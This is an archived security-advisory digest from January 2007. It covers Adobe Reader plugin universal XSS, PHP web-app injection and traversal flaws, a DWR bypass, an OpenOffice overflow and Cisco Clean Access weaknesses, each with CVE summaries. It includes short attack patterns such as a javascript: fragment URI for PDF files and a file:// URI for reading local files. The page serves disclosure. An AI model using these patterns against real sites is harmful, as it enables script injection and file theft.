Computer Security
[EN] securityvulns.ru no-pyccku


Adobe reader plugin PDF files universal crossite scripting
updated since 03.01.2007
Published:04.01.2007
Source:
SecurityVulns ID:6994
Type:client
Threat Level:
7/10
Description:1. By using URIs like http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here it's possible to execute code in context of any Web site where at least one PDF is stored. 2. By using "trigger action" in PDF document it's possible to execute code in context of the web page where document is stored. There are also more bugs exploitable thorugh a web page.
Affected:ADOBE : Acrobat Reader 6.0
 ADOBE : Acrobat Reader 7.0
CVE:CVE-2007-1199 (Adobe Reader and Acrobat Trial allow remote attackers to read arbitrary files via a file:// URI in a PDF document, as demonstrated with <</URI(file:///C:/)/S/URI>>, a different issue than CVE-2007-0045.)
 CVE-2007-0048 (Adobe Acrobat Reader Plugin before 8.0.0, when used with Internet Explorer, allows remote attackers to cause a denial of service (memory consumption) via a long sequence of # (hash) characters appended to a PDF URL.)
 CVE-2007-0047 (CRLF injection vulnerability in Adobe Acrobat Reader Plugin before 8.0.0, when used with the Microsoft.XMLHTTP ActiveX object in Internet Explorer, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the javascript: URI in the (1) FDF, (2) XML, or (3) XFDF AJAX request parameters.)
 CVE-2007-0046 (Double free vulnerability in the Adobe Acrobat Reader Plugin before 8.0.0, as used in Mozilla Firefox 1.5.0.7, allows remote attackers to execute arbitrary code by causing an error via a javascript: URI call to document.write in the (1) FDF, (2) XML, or (3) XFDF AJAX request parameters.)
 CVE-2007-0045 (Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0 for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS).")
 CVE-2007-0044 (Adobe Acrobat Reader Plugin before 8.0.0 for the Firefox, Internet Explorer, and Opera web browsers allows remote attackers to force the browser to make unauthorized requests to other web sites via a URL in the (1) FDF, (2) xml, and (3) xfdf AJAX request parameters, following the # (hash) character, aka "Universal CSRF and session riding.")
Original documentdocumentStefano Di Paola, Adobe Acrobat Reader Plugin - Multiple Vulnerabilities (04.01.2007)
 documentMaximize Designs, Re: Unpatchable Quicktime XSS (03.01.2007)
 documentpdp (architect), [Full-disclosure] Universal XSS with PDF files: highly dangerous (03.01.2007)

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:04.01.2007
Source:
SecurityVulns ID:6995
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:OPENPINBOARD : OpenPinboard 2.0
CVE:CVE-2007-0093 (SQL injection vulnerability in page.php in Simple Web Content Management System allows remote attackers to execute arbitrary SQL commands via the id parameter.)
 CVE-2007-0090 (WineGlass stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/data.mdb.)
 CVE-2007-0089 (jgbbs stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/bbs.mdb.)
 CVE-2007-0088 (Multiple directory traversal vulnerabilities in openmedia allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) src parameter to page.php or the (2) format parameter to search_form.php.)
 CVE-2007-0050 (** DISPUTED ** PHP remote file inclusion vulnerability in index.php in OpenPinboard 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the language parameter. NOTE: this issue has been disputed by the developer and a third party, since the variable is set before use. CVE analysis suggests that there is a small time window of risk before the installation is complete.)
Original documentdocumentdr.t3rr0r1st_(at)_yahoo.com, jgbbs (04.01.2007)
 documentzooz_998_(at)_hotmail.com, OpenPinboard <= Remote File Include (04.01.2007)
 documentAdvisory_(at)_Aria-Security.net, WineGlass "data.mdb" Remote Password Disclosure (04.01.2007)
 documentexe_crack_(at)_hotmail.com, openmedia local read file (04.01.2007)
Files:Simple Web Content Management System SQL Injection Exploit

DWR protection bypass
Published:04.01.2007
Source:
SecurityVulns ID:6996
Type:remote
Threat Level:
5/10
Description:Protection againsts functions access is implemented in client side.
Affected:GETAHEAD : DWR 1.1
Original documentdocumentAmichai Shulman, Hacking AJAX DWR Applications (04.01.2007)

OpenOffice buffer overflow
Published:04.01.2007
Source:
SecurityVulns ID:6998
Type:remote
Threat Level:
6/10
Description:Integer overflow leads to heap buffer overflow on EMF/WMF files parsing.
Affected:OPENOFFICE : OpenOffice 1.1
 OPENOFFICE : OpenOffice 2.0
 OPENOFFICE : OpenOffice 2.1
Original documentdocumentNGSSoftware Insight Security Research, [VulnWatch] High Risk Vulnerability in the OpenOffice and StarOffice Suites (04.01.2007)
 documentREDHAT, openoffice.org security update (04.01.2007)

Multiple Cisco Clean Access vulnerabilities
updated since 04.01.2007
Published:09.01.2007
Source:
SecurityVulns ID:6997
Type:remote
Threat Level:
7/10
Description:Shared secret for client access is same for all devices and can not be changed. Location of database backup (snapshot) can be bruteforced and downloaded without authentication.
Affected:CISCO : Cisco Clean Access 3.5
 CISCO : Cisco Clean Access 3.6
 CISCO : Cisco Clean Access 4.0
CVE:CVE-2007-0058 (Cisco Clean Access (CCA) 3.5.x through 3.5.9 and 3.6.x through 3.6.1.1 on the Clean Access Manager (CAM) allows remote attackers to bypass authentication and download arbitrary manual database backups by guessing the snapshot filename using brute force, then making a direct request for the file.)
 CVE-2007-0057 (Cisco Clean Access (CCA) 3.6.x through 3.6.4.2 and 4.0.x through 4.0.3.2 does not properly configure or allow modification of a shared secret authentication key, which causes all devices to have the same shared sercet and allows remote attackers to gain unauthorized access.)
Original documentdocumentDamir Rajnovic, Re: [Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Clean Access (09.01.2007)
 documentCISCO, Cisco Security Advisory: Multiple Vulnerabilities in Cisco Clean Access (04.01.2007)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod